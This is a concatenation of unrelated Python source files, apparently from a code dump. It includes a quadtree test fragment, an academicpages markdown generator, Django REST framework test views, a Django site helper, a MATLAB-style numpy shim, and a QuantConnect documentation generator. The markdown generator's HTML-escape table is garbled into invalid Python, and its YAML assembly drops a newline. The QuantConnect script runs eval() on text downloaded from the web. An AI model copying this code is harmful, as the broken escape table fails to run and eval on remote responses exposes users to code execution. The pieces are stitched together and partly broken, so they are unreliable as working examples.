quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(95, 5)))
)
_olddiff = self.maxDiff
def cleanup(self2=self):
self2.maxDiff = _olddiff
self.addCleanup(cleanup)
self.maxDiff = None
self.assertEqual(
"quadtree(at rect(100x100 at <0, 0>) with 0 entities here (2 in total); (nodes, entities) per depth: [ 0: (1, 0), 1: (4, 2) ] (allowed max depth: 5, actual: 1), avg ent/leaf: 0.5 (target 1), misplaced weight 0.0 (0 best, >1 bad)",
str(_tree),
)
if __name__ == "__main__":
unittest.main()
|
python
|
# coding: utf-8
# # Projects markdown generator for academicpages
#
# Takes a TSV of projects with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook, with the core python code in projects.py. Run either from the `markdown_generator` folder after replacing `projects.tsv` with one that fits your format.
#
# TODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style.
#
# ## Data format
#
# The TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top.
#
# - `excerpt` and `paper_url` can be blank, but the others must have values.
# - `pub_date` must be formatted as YYYY-MM-DD.
# - `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/projects/YYYY-MM-DD-[url_slug]`
# ## Import pandas
#
# We are using the very handy pandas library for dataframes.
# In[2]:
import pandas as pd
# ## Import TSV
#
# Pandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\t`.
#
# I found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others.
# In[3]:
projects = pd.read_csv("projects.tsv", sep="\t", header=0)
projects
# ## Escape special characters
#
# YAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivalents. This makes them look not so readable in raw format, but they are parsed and rendered nicely.
# In[4]:
html_escape_table = {
"&": "&",
'"': """,
"'": "'"
}
def html_escape(text):
"""Produce entities within text."""
return "".join(html_escape_table.get(c,c) for c in text)
# ## Creating the markdown files
#
# This is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatenate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page. If you don't want something to appear (like the "Recommended citation"), simply comment out the lines that add it.
# In[5]:
import os
for row, item in projects.iterrows():
md_filename = str(item.pub_date) + "-" + item.url_slug + ".md"
html_filename = str(item.pub_date) + "-" + item.url_slug
year = item.pub_date[:4]
## YAML variables
md = "---\ntitle: \"" + item.title + '"\n'
md += """collection: projects"""
md += """\npermalink: /project/""" + html_filename
if len(str(item.excerpt)) > 5:
md += "\nexcerpt: '" + html_escape(item.excerpt) + "'"
if len(str(item.location)) > 3:
md += "date: " + str(item.date) + "\n"
md += "\n---"
## Markdown description for individual project
if len(str(item.description)) > 3:
md += "\n" + html_escape(item.description) + "\n"
if len(str(item.excerpt)) > 5:
md += "\n" + html_escape(item.excerpt) + "\n"
md_filename = os.path.basename(md_filename)
with open("../projects/" + md_filename, 'w') as f:
f.write(md)
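# For illustration, a row with title "My Project", url_slug "my-project",
# pub_date "2020-01-15" and a short excerpt would produce
# ../projects/2020-01-15-my-project.md whose YAML front matter looks like:
#
#   ---
#   title: "My Project"
#   collection: projects
#   permalink: /project/2020-01-15-my-project
#   excerpt: 'A short blurb'
#   ---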
|
python
|
from six.moves.urllib.parse import urljoin
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.views import APIView
from rest_framework.viewsets import ReadOnlyModelViewSet, ModelViewSet
from rest_framework.response import Response
from rest_framework import status
from rest_framework.exceptions import ParseError
from collectionjson.renderers import CollectionJsonRenderer
from collectionjson.parsers import CollectionJsonParser
from .models import Dummy, Idiot, Moron, MoronFilter, Simple
from .serializers import MoronHyperlinkedModelSerializer, IdiotHyperlinkedModelSerializer
from .serializers import DummyHyperlinkedModelSerializer, SimpleModelSerializer
class MoronModelViewSet(ModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
parser_classes = (CollectionJsonParser, )
queryset = Moron.objects.all()
serializer_class = MoronHyperlinkedModelSerializer
filter_backends = (DjangoFilterBackend,)
filterset_class = MoronFilter
class MoronReadOnlyModelViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Moron.objects.all()
serializer_class = MoronHyperlinkedModelSerializer
class IdiotReadOnlyModelViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Idiot.objects.all()
serializer_class = IdiotHyperlinkedModelSerializer
class DummyReadOnlyModelViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Dummy.objects.all()
serializer_class = DummyHyperlinkedModelSerializer
class SimpleViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Simple.objects.all()
serializer_class = SimpleModelSerializer
class NoSerializerView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response({'foo': '1'})
class PaginatedDataView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response({
'next': 'http://test.com/colleciton/next',
'previous': 'http://test.com/colleciton/previous',
'results': [{'foo': 1}],
})
class NonePaginatedDataView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response({
'next': None,
'previous': None,
'results': [{'foo': 1}],
})
class ParseErrorView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
raise ParseError('lol nice one')
class UrlRewriteRenderer(CollectionJsonRenderer):
def get_href(self, request):
return urljoin('http://rewritten.com', request.path)
class UrlRewriteView(APIView):
renderer_classes = (UrlRewriteRenderer, )
def get(self, request):
return Response({'foo': 'bar'})
class EmptyView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response(status=status.HTTP_204_NO_CONTENT)
|
python
|
import click
from django.conf import settings
from django.contrib.sites.models import Site
def setup_current_site(site_name=None, domain=None):
'''
Sets up the user with the current site.
'''
site_id = settings.SITE_ID
click.secho('\nA site has not been configured for this CMS. Please answer the questions below.', fg='yellow')
if not (site_name or domain):
domain = click.prompt('Please enter the domain you are registering the site for: (i.e.: mysite.com): ', type=str, default='mysite.com')
site_name = click.prompt('What is the name of your site? (i.e.: MySite DEV): ', type=str, default='MySite DEV')
site = Site.objects.create(id=site_id, domain=domain, name=site_name)
return site
def get_current_site():
'''
Gets the current site information.
'''
if not hasattr(settings, 'SITE_ID'):
msg = '\nYou need to define SITE_ID in your settings. More information: https://docs.djangoproject.com/en/2.0/ref/settings/#std:setting-SITE_ID'
click.secho(msg, fg='red')
raise ValueError(msg)
try:
site_id = settings.SITE_ID
site = Site.objects.get(id=site_id)
return site
except Site.DoesNotExist:
click.secho("Please setup your site by calling 'python manage.py setup_cms' before continuing.", fg='red')
return None
def get_current_site_id():
'''
Gets the current site id.
'''
site = get_current_site()
return site.id if site else None
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/10/12 17:00
# @Author : Iydon
# @File : matlab.py
# `matlab -nodesktop' -> `from matlab import *'
# tic, toc, disp
import time
def tic(): globals()['TIC+TIME'] = time.time()
toc = lambda :time.time()-globals()['TIC+TIME']
disp = print
tic()
# numpy
import numpy
# function from numpy about operators
from numpy import sin, cos, tan, arcsin as asin, arccos as acos, arctan as atan, sinc
from numpy import sinh, cosh, tanh, arcsinh as asinh, arccosh as acosh, arctanh as atanh
from numpy import power, exp, log, log2, log10, log1p, sqrt
from numpy import real, imag
# function from numpy about value
from numpy import linspace, logspace
from numpy import rad2deg, deg2rad, sign, conj
from numpy import prod, cumprod, cumsum, sum, mean, std, min, max, var, cov, sort, mod
from numpy import round, floor, ceil, fix
from numpy import nansum, nanmax, nanmin, nanstd, nanvar
# function from numpy about random
from numpy.random import rand, randn, randint as randi, permutation as randperm
# function from numpy about fft
from numpy.fft import fft, fft2, fftn, fftshift, ifft, ifft2, ifftn, ifftshift
# function from numpy about logical
from numpy import all, any, isinf, isnan
from numpy import logical_and as and_, logical_not as not_, logical_or as or_, logical_xor as xor_
# function from numpy about polynomial
from numpy import poly, roots, polyint, polyder, polyval, polyfit
# function from numpy about matrix
from numpy import matrix, array
from numpy import size, rot90, flip, fliplr, flipud, reshape
from numpy import hstack as horzcat, vstack as vertcat, tile as repmat
from numpy import diag, zeros, ones, eye, char
# function from numpy about matrix calculation
from numpy.linalg import det, solve, inv, pinv, svd, eig, norm, qr, cond
from numpy.linalg import matrix_rank as rank, cholesky as chol
# constant from numpy or by numpy
from numpy import pi, inf, Inf, nan, NaN
i = j = complex(0, 1)
# auxiliary function from numpy
from numpy import who, lookfor, save
# attributes of array and matrix:
# array.T=>{array'}; array.flatten=>{array(:)}
# image function from numpy
from numpy import meshgrid
# scipy
import scipy
# function from numpy about matrix calculation
from scipy.linalg import lu, sqrtm
# matplotlib
import matplotlib
# plot 2D
from matplotlib.pyplot import plot, scatter, bar, barh, contourf, contour, pie, hist, spy, polar
from matplotlib.pyplot import imshow
# current figure
from matplotlib.pyplot import gca, gcf, figure, subplot
# axis ang text
from matplotlib.pyplot import axis, show, xlim, ylim, xticks, yticks, legend, grid
from matplotlib.pyplot import annotate as text, cm as colormap
# auxiliary param
from matplotlib.pyplot import savefig
# pyplot, mplot3d
from mpl_toolkits.mplot3d import Axes3D
"""
t = linspace(-1, 1, 10)
X,Y = meshgrid(t, t)
Z = sin(X*Y)
fig = figure()
axs = Axes3D(fig)
axs.plot_surface(X,Y,Z)
show()
"""
"""
# sympy
import sympy # from sympy import *
# function from sympy about operators
from sympy import symbols as sym
from sympy import sin, cos, tan, asin, acos, atan, sinh, cosh, tanh, asinh, acosh, atanh
from sympy import exp, log
"""
disp("Elapsed time is %.6f seconds."%toc())
|
python
|
import base64
import numpy as np
import os
import pathlib
import re
import shutil
from urllib.request import urlopen
raw = urlopen("https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Algorithm.QCAlgorithm").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
raw_dict = eval(raw)
methods = raw_dict["methods"]
methods = [method for method in methods if 'QuantConnect.Indicators' in str(method["method-return-type-full-name"]) \
and str(method["method-return-type-short-name"]) != 'IndicatorBase<IndicatorDataPoint>']
raw_candle = urlopen("https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Algorithm.CandlestickPatterns").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
raw_candle_dict = eval(raw_candle)
methods_candle = raw_candle_dict["methods"]
candle = [str(method["method-return-type-short-name"]) for method in methods_candle]
methods += methods_candle
names = {}
descriptions = {}
args = {}
plots = {}
updates = {}
update_value = {}
full_apis = {}
root = '02 Writing Algorithms/28 Indicators/07 Indicator Reference'
if os.path.isdir(root):
shutil.rmtree(root)
for method in methods:
item = str(method["method-return-type-short-name"])
names[item] = str(method["method-name"])
args[item] = tuple(x["argument-name"] for x in method["method-arguments"] if not x["argument-optional"])
plots[item] = []
if item not in candle:
ind = urlopen(f"https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Indicators.{item}").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
ind_dict = eval(ind)
detail_description = str(ind_dict['description']).replace("Represents", "This indicator represents")
if "Source: " in detail_description:
link_split = detail_description.split("http")
detail_description = link_split[0].replace("Source: ", f'<sup><a href="https{link_split[1]}">source</a></sup>')
else:
ind = urlopen(f"https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Indicators.CandlestickPatterns.{item}").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
ind_dict = eval(ind)
detail_description = f"Create a new {ind_dict['description']} to indicate the pattern's presence."
descriptions[item] = detail_description
for prop in ind_dict["properties"]:
prop_name = str(prop["property-name"])
if "MovingAverageType" not in prop_name\
and "IsReady" not in prop_name\
and "WarmUpPeriod" not in prop_name\
and "Name" not in prop_name\
and "Period" not in prop_name\
and "Samples" not in prop_name:
plots[item].append(prop_name)
while True:
if "QuantConnect.Indicators.Indicator" in ind_dict["base-type-full-name"]:
updates[item] = (0, tuple(("data[symbol].EndTime", "data[symbol].High")))
update_value[item] = "time/decimal pair"
break
elif "QuantConnect.Indicators.BarIndicator" in ind_dict["base-type-full-name"]:
updates[item] = (1, tuple(("data.QuoteBars[symbol]",)))
update_value[item] = "a <code>TradeBar</code>, <code>QuoteBar</code>, or an <code>IndicatorDataPoint</code>"
break
elif "QuantConnect.Indicators.TradeBarIndicator" in ind_dict["base-type-full-name"]\
or "QuantConnect.Indicators.CandlestickPatterns.CandlestickPattern" in ind_dict["base-type-full-name"]:
updates[item] = (2, tuple(("data.Bars[symbol]",)))
update_value[item] = "a <code>TradeBar</code>"
break
else:
end = ind_dict["base-type-full-name"].split(".")[-1]
ind = urlopen(f"https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Indicators.{end}").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
ind_dict = eval(ind)
i = 0
k = 0
for full, short in dict(sorted(names.items())).items():
name = " ".join(re.findall('[a-zA-Z][^A-Z]*', full))
if full not in candle:
i += 1
base = f"{root}/{i:02} {name}"
source_link = f"https://raw.githubusercontent.com/QuantConnect/Lean/master/Indicators/{'Stochastics' if full == 'Stochastic' else 'Momersion' if full == 'MomersionIndicator' else full}.cs"
else:
k += 1
base = f"{root}/00 Candlestick Pattern/{k:02} {name}"
source_link = f"https://raw.githubusercontent.com/QuantConnect/Lean/master/Indicators/CandlestickPatterns/{full}.cs"
destination_folder = pathlib.Path(base)
destination_folder.mkdir(parents=True, exist_ok=True)
source = urlopen(source_link).read().decode("utf-8")
lines = source.split("\n")
for l in range(len(lines)):
if f"public {full}" in lines[l]:
j = l - 1
temp = {"link": source_link.replace("raw.githubusercontent.com/QuantConnect/Lean", "github.com/QuantConnect/Lean/blob"), "line": l, "summary": "", "args": {}}
if full in full_apis:
temp["param"] = full_apis[full][-1]["param"]
else:
temp["param"] = {}
while "///" in lines[j]:
if "</param>" in lines[j] and "<param name=" in lines[j]:
param = lines[j].split('"')[1]
temp["param"][param] = lines[j].split(">")[1].split("<")[0]
if not temp["param"][param].strip():
temp["param"][param] = "/"
elif temp["param"][param].strip()[-1] != ".":
temp["param"][param] = temp["param"][param].strip() + "."
elif "</summary>" in lines[j]:
temp["summary"] = lines[j-1].split("/// ")[-1].replace('<see cref="', '<code>').replace('"/>', '</code>').replace('" />', '</code>')
if temp["summary"].strip()[-1] != ".":
temp["summary"] = temp["summary"].strip() + "."
j -= 1
try:
constructor_args_ = lines[l].split("(")[1].split(")")[0].split(", ")
constructor_args = []
current = ""
on = True
for num in range(len(constructor_args_)):
if "<" in constructor_args_[num] and ">" not in constructor_args_[num]:
current += constructor_args_[num] + ", "
on = False
elif "<" not in constructor_args_[num] and ">" in constructor_args_[num]:
current += constructor_args_[num]
on = True
else:
current = constructor_args_[num]
on = True
if on:
constructor_args.append(current)
current = ""
except:
constructor_args = None
if not constructor_args:
temp["args"] = {}
else:
for x in [a.split(" ") for a in constructor_args]:
if "=" in x:
ind = x.index("=")
temp["args"][f"*{''.join(x[:(ind-1)])}"] = x[ind - 1]
if x[ind - 1] in temp["args"]:
temp["param"][x[ind - 1]] = f"<span class='qualifier'>(Optional)</span> {temp['param'][x[ind - 1]]} Default: {''.join(x[(ind+1):]).strip()}"
else:
temp["param"][x[ind - 1]] = f"<span class='qualifier'>(Optional)</span> /. Default: {''.join(x[(ind+1):]).strip()}"
elif len(x) == 2:
temp["args"][x[0]] = x[1]
if full in full_apis:
full_apis[full].append(temp)
else:
full_apis[full] = [temp]
with open(destination_folder / "01 Introduction.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>{descriptions[full]}</p>""")
api = []
with open("02 Writing Algorithms/98 API Reference/02.html", "r", encoding="utf-8") as fin:
lines = fin.readlines()
active = False
for line in lines:
if active and 'button class="method-tag"' not in line:
api.append(line)
if "</div>" in line and " " not in line:
active = False
if not active and f'<a id="{short}-header"></a>' in line:
active = True
with open(destination_folder / "02 Create Manual Indicators.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<style>
.method-container {{
border: 1px solid #D9E1EB;
border-top: 0;
border-radius: 4px;
margin-top: 2rem;
}}
.method-container > div {{
padding-left: 1.5rem;
padding-right: 1rem;
margin-bottom: 2rem;
}}
.method-details > div {{
margin-bottom: 2rem;
display: block;
}}
.method-header {{
background: #FBFCFD;
border-bottom: 1px solid #D9E1EB;
border-top: 1px solid #D9E1EB;
padding: 1.5rem;
}}
.method-header > pre {{
white-space: pre-line;
}}
.method-header:first-child {{
border-radius: 4px 4px 0px 0px;
}}
.method-order {{
color: #8F9CA3;
font-size: 14px;
margin-left: 0.5rem;
}}
.parameter-table{{
margin: 2rem 0 2rem -0.25rem;
display: block;
overflow-x: auto;
}}
.parameter-table th {{
padding-bottom: 1rem;
text-align: left;
}}
.parameter-table td {{
padding: 1rem 3rem 0 0;
vertical-align: top;
}}
.show-hide-detail {{
background: none;
border: none;
padding: 0;
color: #069;
cursor: pointer;
}}
</style>
<script>
function ShowHide(event, idName) {{
var x = document.getElementById(idName);
if (x.style.display == "none") {{
x.style.display = "block";
event.target.innerHTML = "<span>Hide Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-hide.svg' alt='arrow-hide'></span>";
}}
else {{
x.style.display = "none";
event.target.innerHTML = "<span>Show Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-show.svg' alt='arrow-show'></span>";
}}
}};
</script>
<p>{f"You can manually create a <code>{full}</code> indicator, so it doesn’t automatically update." if full not in candle else "A candlestick pattern indicator requires manual creation and update with a <code>TradeBar</code> object."} Manual indicators let you update their values with any data you choose. The following reference table describes the <code>{full}</code> constructor.</p>
<div class="method-container">
""")
for e, code in enumerate(full_apis[full]):
html_file.write(f""" <div class="method-header">
<h3>{full}()<span class="method-order">{e+1}/{len(full_apis[full])}</span></h3>
<pre>
<font color="#8F9CA3">{full}</font> QuantConnect.Indicators.{"CandlestickPatterns." + full if full in candle else full} (
""")
if len(code["args"].items()) > 0:
length = max([len(x) for x in code["args"].keys()]) + 2
for e, (arg_type, arg_name) in enumerate(code["args"].items()):
html_file.write(f"""  <code>{arg_type}</code>{" " * (length - len(arg_type))}{arg_name}{"," if e != len(code["args"])-1 else ""}
""")
html_file.write(f""" )
</pre>
</div>
<div class="method-description">
<p>{code["summary"]}</p>
</div>
<div class="details-btn">
<button class="show-hide-detail" onclick="ShowHide(event, '{full}-{code["line"]}')"><span>Show Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-show.svg' alt='arrow-show'></span></button>
</div>
<div class="method-details" id="{full}-{code["line"]}" style="display: none;" >
<div class="parameter-list">
<table class="parameter-table">
<th><strong>Parameters</strong></th>
""")
if len(code["args"].items()) == 0:
html_file.write(' <tr><td colspan="3">This constructor does not take any argument.</td></tr>\n')
else:
for arg_type, arg_name in code["args"].items():
html_file.write(f""" <tr><td><code>{arg_type}</code></td>
<td>{arg_name}</td>
<td>{code["param"][arg_name] if arg_name in code["param"] else "<span class='qualifier'>(Optional)</span> /" if "*" in arg_type else "/"}</td></tr>
""")
html_file.write(f""" </table>
</div>
<div class="method-return">
<h4>Return</h4>
<p><code>{full}</code> - The new <code>{full}</code> indicator object.</p></div>
<div class="method-def">
<p>Definition at <a href="{code['link']}#L{code['line']}">line {code['line']} of file {'/'.join(code['link'].split('/')[-2:])}.</a></p>
</div>
</div>
""")
index_min = np.argmin(np.array([len(full_apis[full][n]["param"].items()) for n in range(len(full_apis[full]))]))
html_file.write("</div>")
with open(destination_folder / "03 Update Manual Indicators.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>You can update the indicator automatically or manually.</p>
<h4>Automatic Update</h4>
<p>To register a manual indicator for automatic updates with the security data, call the <code>RegisterIndicator</code> method.</p>
<div class="section-example-container">
<pre class="csharp">{"using QuantConnect.Indicators.CandlestickPatterns;" if full in candle else ""}
private {full} _{short.lower()};
// In Initialize()
_{short.lower()} = new {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')')};
_{short.lower()}.Updated += IndicatorUpdateMethod;
RegisterIndicator(symbol, _{short.lower()}, Resolution.Daily);
// In IndicatorUpdateMethod()
if (_{short.lower()}.IsReady)
{{
var indicatorValue = _{short.lower()}.Current.Value;
}}</pre>
<pre class="python">{"from QuantConnect.Indicators.CandlestickPatterns import " + full if full in candle else ""}
# In Initialize()
self.{short.lower()} = {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')')}
self.{short.lower()}.Updated += self.IndicatorUpdateMethod
self.RegisterIndicator(symbol, self.{short.lower()}, Resolution.Daily)
# In IndicatorUpdateMethod()
if self.{short.lower()}.IsReady:
indicator_value = self.{short.lower()}.Current.Value</pre>
</div>
<p>To customize the data that automatically updates the indicator, see <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/consolidating-data/updating-indicators#03-Custom-Indicator-Periods">Custom Indicator Periods</a> and <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/consolidating-data/updating-indicators#04-Custom-Indicator-Values">Custom Indicator Values</a>.</p>
<h4>Manual Update</h4>
<p>Updating your indicator manually enables you to control when the indicator is updated and what data you use to update it. To manually update the indicator, call the <code>Update</code> method with {update_value[full]}. The indicator will only be ready after you prime it with enough data.</p>
<div class="section-example-container">
<pre class="csharp">{"using QuantConnect.Indicators.CandlestickPatterns;" if full in candle else ""}
private {full} _{short.lower()};
{'private Symbol symbol;' if 'symbol' in args[full] else 'private List<Symbol> symbols;' if 'symbols' in args[full] else ''}
// In Initialize()
_{short.lower()} = new {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')};
{'symbol = AddEquity("SPY").Symbol;' if 'symbol' in args[full] else 'symbols = new List<Symbol> {AddEquity("SPY").Symbol, AddEquity("QQQ").Symbol};' if 'symbols' in args[full] else ''}
// In OnData()
if ({"data" if updates[full][0] == 0 else "data.QuoteBars" if updates[full][0] == 1 else "data.Bars"}.ContainsKey(symbol))
{{
_{short.lower()}.Update{str(updates[full][1]).replace("'", "").replace('"', '').replace(',)', ')')};
}}
if (_{short.lower()}.IsReady)
{{
var indicatorValue = _{short.lower()}.Current.Value;
}}</pre>
<pre class="python">{"from QuantConnect.Indicators.CandlestickPatterns import " + full if full in candle else ""}
# In Initialize()
self.{short.lower()} = {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')}
{'self.symbol = self.AddEquity("SPY").Symbol' if 'symbol' in args[full] else 'self.symbols = [self.AddEquity("SPY").Symbol, self.AddEquity("QQQ").Symbol]' if 'symbols' in args[full] else ''}
# In OnData()
if {"data" if updates[full][0] == 0 else "data.QuoteBars" if updates[full][0] == 1 else "data.Bars"}.ContainsKey(self.symbol):
self.{short.lower()}.Update{str(updates[full][1]).replace("'", "").replace('"', '').replace(',)', ')').replace("symbol", "self.symbol")}
if self.{short.lower()}.IsReady:
indicator_value = self.{short.lower()}.Current.Value</pre>
</div>""")
if full not in candle:
with open(destination_folder / "04 Create Automatic Indicators.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<style>
.method-container {{
border: 1px solid #D9E1EB;
border-top: 0;
border-radius: 4px;
margin-top: 2rem;
}}
.method-container > div {{
padding-left: 1.5rem;
padding-right: 1rem;
margin-bottom: 2rem;
}}
.method-details > div {{
margin-bottom: 2rem;
display: block;
}}
.method-header {{
background: #FBFCFD;
border-bottom: 1px solid #D9E1EB;
border-top: 1px solid #D9E1EB;
padding: 1.5rem;
}}
.method-header > pre {{
white-space: pre-line;
}}
.method-header:first-child {{
border-radius: 4px 4px 0px 0px;
}}
.method-order {{
color: #8F9CA3;
font-size: 14px;
margin-left: 0.5rem;
}}
.parameter-table{{
margin: 2rem 0 2rem -0.25rem;
display: block;
overflow-x: auto;
}}
.parameter-table th {{
padding-bottom: 1rem;
text-align: left;
}}
.parameter-table td {{
padding: 1rem 3rem 0 0;
vertical-align: top;
}}
.show-hide-detail {{
background: none;
border: none;
padding: 0;
color: #069;
cursor: pointer;
}}
</style>
<script>
function ShowHide(event, idName) {{
var x = document.getElementById(idName);
if (x.style.display == "none") {{
x.style.display = "block";
event.target.innerHTML = "<span>Hide Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-hide.svg' alt='arrow-hide'></span>";
}}
else {{
x.style.display = "none";
event.target.innerHTML = "<span>Show Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-show.svg' alt='arrow-show'></span>";
}}
}};
</script>
<p>The {short} method creates an {full} indicator, sets up a consolidator to update the indicator, and then returns the indicator so you can use it in your algorithm.</p>
<p>The following reference table describes the <code>{short}</code> method:</p>
{"".join(api)}
<br/>
<p>If you don't provide a resolution, it defaults to the security resolution. If you provide a resolution, it must be greater than or equal to the resolution of the security. For instance, if you subscribe to hourly data for a security, you should update its indicator with data that spans 1 hour or longer.</p>
<p>For more information about the selector argument, see <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/indicators/automatic-indicators#07-Alternative-Price-Fields">Alternative Price Fields</a>.</p>""")
with open(destination_folder / "05 Get Indicator Values.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>To get the value of the indicator, use its <code>Current.Value</code> attribute.</p>
<div class="section-example-container">
<pre class="csharp">private {full} _{short.lower()};
// In Initialize()
{'var symbol = AddEquity("SPY").Symbol;' if 'symbol' in args[full] else 'var symbols = new[] {AddEquity("SPY").Symbol, AddEquity("QQQ").Symbol};' if 'symbols' in args[full] else ''}
_{short.lower()} = {short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')};
// In OnData()
if (_{short.lower()}.IsReady)
{{
""")
for x in plots[full]:
html_file.write(f''' var {x[0].lower()+x[1:]} = _{short.lower()}.{x}.Value;
''')
html_file.write(f"""}}</pre>
<pre class="python"># In Initialize()
{'symbol = self.AddEquity("SPY").Symbol' if 'symbol' in args[full] else 'symbols = [self.AddEquity("SPY").Symbol, self.AddEquity("QQQ").Symbol]' if 'symbols' in args[full] else ''}
self.{short.lower()} = self.{short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')}
# In OnData()
if self.{short.lower()}.IsReady:
""")
for x in plots[full]:
html_file.write(f''' {"_".join([y.lower() for y in re.findall('[A-Z][^A-Z]*', x) if y])} = self.{short.lower()}.{x}.Value
''')
html_file.write(f"""</pre>
</div>""")
image_file = f"Resources/indicators/plots/indicator-reference-{short if full != 'IntradayVwap' else 'IntradayVwap'}.png"
if os.path.isfile(image_file):
with open(destination_folder / "06 Visualization.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>To plot indicator values, in the <code>OnData</code> event handler, call the <code>Plot</code> method.</p>
<div class="section-example-container">
<pre class="csharp">private {full} _{short.lower()};
// In Initialize()
{'var symbol = AddEquity("SPY").Symbol;' if 'symbol' in args[full] else 'var symbols = new[] {AddEquity("SPY").Symbol, AddEquity("QQQ").Symbol};' if 'symbols' in args[full] else ''}
_{short.lower()} = {short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')};
// In OnData()
if (_{short.lower()}.IsReady)
{{
""")
for x in plots[full]:
html_file.write(f''' Plot("My Indicators", "{x.lower() if x != "Current" else full.lower()}", _{short.lower()}.{x});
''')
html_file.write(f"""}}</pre>
<pre class="python"># In Initialize()
{'symbol = self.AddEquity("SPY").Symbol' if 'symbol' in args[full] else 'symbols = [self.AddEquity("SPY").Symbol, self.AddEquity("QQQ").Symbol]' if 'symbols' in args[full] else ''}
self.{short.lower()} = self.{short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')}
# In OnData()
if self.{short.lower()}.IsReady:
""")
for x in plots[full]:
html_file.write(f''' self.Plot("My Indicators", "{x.lower() if x != "Current" else full.lower()}", self.{short.lower()}.{x})
''')
with open(image_file, "rb") as image_file:
encoded_string = base64.b64encode(image_file.read())
html_file.write(f"""</pre>
</div>
<img class="docs-image" src="data:image/png;base64,{encoded_string.decode('utf-8')}">
<p>For more information about plotting indicators, see <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/indicators/plotting-indicators">Plotting Indicators</a>.</p>""")
else:
print(f"Image is not found for {short}, no visualization page is generated.")
with open("Resources/indicators/indicator_count.html", "w", encoding="utf-8") as html_file:
html_file.write(f"There are {i} indicators.")
with open("Resources/indicators/candlestick_pattern_count.html", "w", encoding="utf-8") as html_file:
html_file.write(f"There are {k} candlestick pattern indicators.")
|
python
|
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import seaborn as sns
import pandas as pd
import numpy as np
import math
import os
from scipy.cluster.hierarchy import dendrogram
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import umap
from matplotlib import rcParams
from wordcloud import WordCloud
import random
sns.set()
cmap = cm.get_cmap("viridis")
rcParams['font.family'] = 'sans-serif'
